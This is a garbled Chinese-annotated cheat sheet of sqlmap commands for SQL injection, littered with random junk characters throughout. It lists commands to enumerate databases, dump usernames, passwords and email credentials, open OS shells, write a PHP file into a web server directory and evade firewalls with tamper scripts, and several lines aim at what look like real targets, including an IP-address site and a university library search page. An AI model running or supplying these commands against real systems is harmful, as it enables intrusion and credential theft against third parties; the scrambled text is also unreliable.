/pentest/database/sqlmap; y9 d2 T+ w$ N U6 {, C
N8 R6 f0 Y/ n) x( L: y" l! nupdate :::::> in the folder after execute following order : svn update2 u6 @$ h) e: u: a
6 }* _8 r* ]. }% q- p% e) ssqlmap.py -r 1.txt --current-db" l q1 m$ e4 q+ w8 I4 ~+ l' W$ i
( H% t7 F$ z8 J! P0 ~9 Jv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
" e( e0 Z( U+ _9 }. ~1 j$ j9 f6 C4 W6 i" V4 [: x: N$ b
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 0 q1 U4 \3 ?* \" V( ]
猜解数据库5 a+ F. E* r2 l! C
./sqlmap.py -u "injection-url" --dbs
0 t+ K5 H, |% m* I8 asqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
/ u- r9 a3 u: C& ?2 x8 i$ j0 d9 B' F* a! l! `* ~
猜解表名. Q, F9 f# F1 t; \( k) Q
./sqlmap.py -u "injection-url" -D database_name --tables
) P' T c# {8 |* U- X! g
! N4 w6 E" J; Wsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py", c5 H6 t# l9 E
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" $ C9 Z4 d( `6 N
) n! B* I# l5 P7 k2 G
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump3 @( l6 j& E, {% v
k* K: M3 J6 |; X. k' H
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
5 q) _9 i q3 |- _9 @2 Zsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
) I6 R( c& C [8 |sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
/ D7 o, ?1 }2 q) b! R0 gsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"0 z! N4 W8 e( |4 {4 h% ~
7 V8 f; s0 e! msqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
b7 P2 {! r/ }0 b- w' wsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
" q/ f1 R: |% e3 U( x& wsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"+ q) p) l: F& w( R# O* r0 @! U
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"( X; S- w* {4 k/ x- l
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
6 A8 l+ _& q' t
' a; G+ M+ i- E t$ v; }! |sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
( m# B& Q/ f; O' }3 r3 |sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
5 U* ?# y; S7 [( R/ c
7 _5 p6 a, E, p0 W% x2 t8 m4 ~! h: Nsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst": t' g$ d$ z) g8 O) H5 ^2 ]' m0 @0 [
猜解列名
) d) ^5 ~4 @' g. u: V% Z./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
" m# [3 r" ?, y! p9 i1 y4 F. G& c1 j4 |0 [# f5 ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ; i, _6 ~" u. l2 G' E
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
( P* h5 E2 S: Hsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"8 X; n2 r. `: }1 D. O
4 x: `* a# P. S
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"9 k& n+ k& A* J8 b3 e3 t
&submit=Go( k9 }; {3 s2 r5 S0 D N
猜解值
% f" t; I+ ^; P+ X* |2 b: j, U./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump+ Z7 T7 f3 D L2 H6 `* I
========================================================
6 A2 q3 D- K0 e# e/ S- T* k搜索表名中包括mana字符的, c; C4 F: T1 b
/sqlmap.py -u "injection-url" -T mana --search
3 ~0 u0 k2 k- `# C+ z2 Q返回一个交互式sql shell1 ]+ M/ q6 q; Z+ e/ \
/sqlmap.py -u "injection-url" --sql-shell) v' \) {9 ^& [
读取指定文件(需权限)
D" C7 A8 r$ c) M/sqlmap.py -u "injection-url" --file-read "c:\boot.ini": l+ @& m8 w$ ?) |4 [2 L
查看当前 用户 及 数据库
0 p3 [4 G Z0 _- T+ |( v6 ~9 B8 J/sqlmap.py -u "injection-url" --current-user --current-db
$ f+ y: \( M: S本地文件 写入 远程目标绝对路径/ b K0 h: W2 O( Q! g1 @& {
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% i, g/ q& N0 V& Vsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
9 f& v6 A _. {1 V M
# Z4 Q# L R% d7 n F( Wsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% w* o: M+ I( n8 u' q, p查看某用的权限
% s- R+ Y1 J/ P/sqlmap.py -u "injection-url" --privileges -U root) _5 }6 ^; }6 e
查看当前用户是否为dba
& d* o4 d6 R1 i; ~/sqlmap.py -u "injection-url" --is-dba: Y8 n' k& C! _; y$ i1 _1 ^3 o7 u
读取所有数据库用户或指定数据库用户的密码
1 j: Z4 z2 S& p4 K! f# Usqlmap.py -r 1.txt --users --passwords3 w9 U" S5 W! s$ \$ F; p+ B9 x' B
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 0 w5 ]) y- q& }7 E
/ r9 O2 M9 d5 g2 j( e! B9 G6 c/sqlmap.py -u "injection-url" --passwords -U root
& B3 Y1 l; [3 T) |7 ?5 f1 {6 C; e( h
--start&&--stop 与 --first&&--last 的区别0 l- z/ t% r3 R3 [. |! s4 q# j
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
4 j; Z* S3 F0 o& S1 [7 t
' O" w" j9 r1 ~! Z* c从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
( p+ a3 }. c! c* H; Y/ D/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
& b2 Q6 e: `9 m$ H/ U/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns7 `& Y$ i2 C# P+ N# E( N% {! _; M
% m; ?' K% O% C
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
- D0 v2 A: U% r; _. j) h/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
# h8 K5 z9 _8 M$ N7 R7 k, [, F% }1 R) V8 ~$ U+ ]" |8 ~. ~
|